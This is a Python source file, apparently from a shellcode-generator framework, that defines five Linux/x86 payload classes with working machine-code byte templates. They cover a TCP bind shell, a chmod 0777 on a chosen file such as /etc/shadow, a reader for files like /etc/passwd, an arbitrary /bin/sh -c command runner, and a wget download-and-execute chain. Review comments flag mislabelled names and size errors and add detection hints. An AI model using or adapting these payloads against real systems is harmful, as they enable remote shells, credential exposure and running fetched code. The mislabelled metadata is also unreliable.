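class Payload(Shellcode):
    """Linux/x86 payload record whose byte template embeds a caller-supplied port.

    The class body fills the shared ``Shellcode.info`` dictionary with
    descriptive metadata; ``__init__`` adds the ``size`` and ``payload``
    entries once ``lport`` is known.

    NOTE(review): the ``name`` and ``rawassembly`` entries describe only an
    ``execve`` of ``/bin//sh``, yet the payload template interpolates
    ``lport`` and contains four ``mov al, 0x66`` / ``int 0x80`` sequences
    (``socketcall`` on i386) plus a ``0x3f`` (``dup2``) loop before the
    ``execve``. It therefore looks like a TCP bind shell rather than a bare
    ``execve``. Confirm against the referenced write-ups and align the
    metadata, because anyone triaging this entry by name alone would
    under-estimate its network behaviour.
    """

    # These writes go to the base-class dict, not to this class or an
    # instance, so every payload module that is loaded overwrites the same keys.
    Shellcode.info["author"] = "xmgv"
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    Shellcode.info["rawassembly"] = [
        "xor %eax,%eax",
        "push %eax",
        "push $0x68732f2f",
        "push $0x6e69622f",
        "mov %esp,%ebx",
        "push %eax",
        "push %ebx",
        "mov %esp,%ecx",
        "mov $0xb,%al",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and byte template for the requested port.

        Args:
            **kwargs: must contain ``lport``. The value is concatenated into
                the hex-escaped template verbatim, so it is presumably
                already hex-escaped text -- verify against the caller.

        Raises:
            KeyError: if ``lport`` is not supplied.
        """
        lport = kwargs["lport"]
        # The size is computed here because ``kwargs`` exists only inside
        # ``__init__``; evaluated in the class body it raised NameError while
        # the class was being defined. 94 is the number of fixed bytes in
        # the template below.
        Shellcode.info["size"] = 94 + Shellcode.getsize(lport)
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + lport +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]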
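class Payload(Shellcode):
    """Linux/x86 payload record parameterised by a target file path.

    The class body fills the shared ``Shellcode.info`` dictionary with
    descriptive metadata; ``__init__`` adds the ``size`` and ``payload``
    entries once ``file`` is known.

    NOTE(review): the ``name`` says "file reader", but ``rawassembly`` loads
    syscall number ``0xf`` (``chmod`` on i386) with ``cx = 0x1ff`` (mode
    0777) and then exits, and the payload template carries the matching
    ``b0 0f`` / ``66 b9 ff 01`` bytes. The entry therefore appears to loosen
    permissions on the file rather than read it; the sample listing pushes
    the string ``//etc/shadow``. Confirm against the reference and correct
    the label. The relevant host-side signal is an unexpected mode change
    on a sensitive file, not a read.
    """

    # These writes go to the base-class dict, not to this class or an
    # instance, so every payload module that is loaded overwrites the same keys.
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    Shellcode.info["rawassembly"] = [
        "xor %eax,%eax",
        "push %eax",
        "push $0x776f6461",
        "push $0x68732f63",
        "push $0x74652f2f",
        "mov $0xf,%al",
        "mov %esp,%ebx",
        "mov $0x1ff,%cx",
        "int $0x80",
        "xor %eax,%eax",
        "inc %eax",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and byte template for the requested file.

        Args:
            **kwargs: must contain ``file``. The value is concatenated into
                the hex-escaped template verbatim, so it is presumably the
                already-encoded push sequence for the path -- verify against
                the caller.

        Raises:
            KeyError: if ``file`` is not supplied.
        """
        target = kwargs["file"]
        # The size is computed here because ``kwargs`` exists only inside
        # ``__init__``; evaluated in the class body it raised NameError while
        # the class was being defined.
        # NOTE(review): the template below holds 18 fixed bytes, not 19.
        # Left unchanged because getsize() is not visible here -- confirm.
        Shellcode.info["size"] = 19 + Shellcode.getsize(target)
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + target +
            r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]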
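class Payload(Shellcode):
    """Linux/x86 payload record that reads a file and writes it to stdout.

    Per ``rawassembly`` the sequence is ``open`` (syscall 5) on the pushed
    path, ``read`` (3) of up to 0x1000 bytes, ``write`` (4) to descriptor 1
    and ``exit`` (1). The sample listing pushes the string ``//etc/passwd``.
    The payload template substitutes the caller's ``file`` value where the
    listing has its three ``push`` instructions.

    The class body fills the shared ``Shellcode.info`` dictionary with
    descriptive metadata; ``__init__`` adds the ``size`` and ``payload``
    entries once ``file`` is known.
    """

    # These writes go to the base-class dict, not to this class or an
    # instance, so every payload module that is loaded overwrites the same keys.
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    Shellcode.info["rawassembly"] = [
        "xor %ecx,%ecx",
        "xor %eax,%eax",
        "xor %edx,%edx",
        "push %ecx",
        "mov $0x5,%al",
        "push $0x64777373",
        "push $0x61702f63",
        "push $0x74652f2f",
        "mov %esp,%ebx",
        "int $0x80",
        "mov %ebx,%ecx",
        "mov %eax,%ebx",
        "mov $0x3,%al",
        "mov $0xfff,%dx",
        "inc %dx",
        "int $0x80",
        "xor %eax,%eax",
        "xor %ebx,%ebx",
        "mov $0x1,%bl",
        "mov $0x4,%al",
        "int $0x80",
        "xor %eax,%eax",
        "mov $0x1,%al",
        "int $0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and byte template for the requested file.

        Args:
            **kwargs: must contain ``file``. The value is concatenated into
                the hex-escaped template verbatim, so it is presumably the
                already-encoded push sequence for the path -- verify against
                the caller.

        Raises:
            KeyError: if ``file`` is not supplied.
        """
        target = kwargs["file"]
        # The size is computed here because ``kwargs`` exists only inside
        # ``__init__``; evaluated in the class body it raised NameError while
        # the class was being defined. 43 is the number of fixed bytes in
        # the template below.
        Shellcode.info["size"] = 43 + Shellcode.getsize(target)
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + target +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]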
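class Payload(Shellcode):
    """Linux/x86 payload record that embeds a caller-supplied shell command.

    The fixed bytes of the template push ``-c``, ``/sh`` and ``/bin`` and
    end in ``int 0x80`` with ``eax = 0x0b`` (``execve``), so the command
    text appears to be handed to ``/bin/sh -c``. On a host this shows up as
    a shell spawned with ``-c`` by the affected process.

    NOTE(review): unlike the sibling payloads, this class sets neither
    ``references`` nor ``rawassembly``. Because ``Shellcode.info`` is shared
    on the base class, values left there by another payload module would
    remain visible under this entry -- confirm how ``info`` is reset.
    """

    # These writes go to the base-class dict, not to this class or an
    # instance, so every payload module that is loaded overwrites the same keys.
    Shellcode.info["author"] = "Unkown"
    Shellcode.info["name"] = "Linux/x86 - exec shellcode"

    def __init__(self, **kwargs):
        """Hex-escape the command and store the size and byte template.

        Args:
            **kwargs: must contain ``execommand``, the command as plain
                text; each character is rewritten as a hex escape before
                being spliced into the template.

        Raises:
            KeyError: if ``execommand`` is not supplied.
        """
        # NOTE(review): the "hex" codec on str exists only on Python 2; on
        # Python 3 this call raises LookupError. Kept as-is because the
        # target interpreter is not visible from here.
        encoded = "".join("\\x" + ch.encode("hex") for ch in kwargs["execommand"])
        # The size is computed here because ``kwargs`` exists only inside
        # ``__init__``; evaluated in the class body it raised NameError while
        # the class was being defined. It is taken from the hex-escaped
        # form, on the assumption that getsize() expects the same escaped
        # text the sibling payloads pass -- TODO confirm.
        Shellcode.info["size"] = 36 + Shellcode.getsize(encoded)
        Shellcode.info["payload"] = [
            r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
            r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
            r"\x00\x00\x00" + encoded +
            r"\x00\x57\x53\x89\xe1\xcd\x80"
        ]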
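class Payload(Shellcode):
    """Linux/x86 payload record for a download-then-execute sequence.

    Per ``rawassembly`` the code forks (syscall 2). One branch calls
    ``execve`` on ``/usr/bin/wget`` with the pushed URL; the other sleeps
    (``0xa2``, ``nanosleep``), sets mode 0777 on the file (``0xf``,
    ``chmod`` with ``cx = 0x1ff``) and calls ``execve`` on it. The payload
    template substitutes the caller's ``filename`` (twice) and ``url`` for
    the sample pushes in the listing.

    For defenders, the observable chain is ``wget`` spawned by the affected
    process, followed by a chmod to 0777 and execution of a file that was
    just written.

    The class body fills the shared ``Shellcode.info`` dictionary with
    descriptive metadata; ``__init__`` adds the ``size`` and ``payload``
    entries once the parameters are known.
    """

    # These writes go to the base-class dict, not to this class or an
    # instance, so every payload module that is loaded overwrites the same keys.
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/39389/"
    ]
    Shellcode.info["rawassembly"] = [
        "xor eax,eax",
        "mov al,0x2",
        "int 0x80",
        "xor ebx,ebx",
        "cmp eax,ebx",
        "jz 0x47",
        "xor ecx,ecx",
        "xor ebx,ebx",
        "xor eax,eax",
        "push byte +0x5",
        "mov ecx,esp",
        "mov ecx,esp",
        "mov ebx,esp",
        "mov al,0xa2",
        "int 0x80",
        "xor ecx,ecx",
        "xor eax,eax",
        "push eax",
        "mov al,0xf",
        "push byte +0x68",
        "mov ebx,esp",
        "xor ecx,ecx",
        "mov cx,0x1ff",
        "int 0x80",
        "xor eax,eax",
        "push eax",
        "push byte +0x68",
        "mov ebx,esp",
        "push eax",
        "mov edx,esp",
        "push ebx",
        "mov ecx,esp",
        "mov al,0xb",
        "int 0x80",
        "xor eax,eax",
        "inc eax",
        "int 0x80",
        "push byte +0xb",
        "pop eax",
        "cdq",
        "push edx",
        "push dword 0x682f6365",
        "push dword 0x78652f2f",
        "push dword 0x6f692e62",
        "push dword 0x75687469",
        "push dword 0x672e6d34",
        "push dword 0x626d3362",
        "mov ecx,esp",
        "push edx",
        "push byte +0x74",
        "push dword 0x6567772f",
        "push dword 0x6e69622f",
        "push dword 0x7273752f",
        "mov ebx,esp",
        "push edx",
        "push ecx",
        "push ebx",
        "mov ecx,esp",
        "int 0x80",
    ]

    def __init__(self, **kwargs):
        """Store the size and byte template for the given file name and URL.

        Args:
            **kwargs: must contain ``filename`` and ``url``. Both values are
                concatenated into the hex-escaped template verbatim, so they
                are presumably already-encoded push sequences -- verify
                against the caller.

        Raises:
            KeyError: if ``filename`` or ``url`` is not supplied.
        """
        filename = kwargs["filename"]
        url = kwargs["url"]
        # The size is computed here because ``kwargs`` exists only inside
        # ``__init__``; evaluated in the class body it raised NameError while
        # the class was being defined. 101 is the number of fixed bytes in
        # the template; ``filename`` is counted twice because it is embedded
        # twice.
        # NOTE(review): ``url`` is wrapped in a list while ``filename`` is
        # passed as a plain value. Kept as written because getsize() is not
        # visible here -- confirm which form it expects.
        Shellcode.info["size"] = (
            101 + Shellcode.getsize(filename) * 2 + Shellcode.getsize([url])
        )
        Shellcode.info["payload"] = [
            r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
            r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
            r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
            r"\xc0\x50\xb0\x0f" + filename +
            r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
            r"\xc0\x50" + filename +
            r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
            r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" + url +
            r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
            r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
            r"\x52\x51\x53\x89\xe1\xcd\x80"
        ]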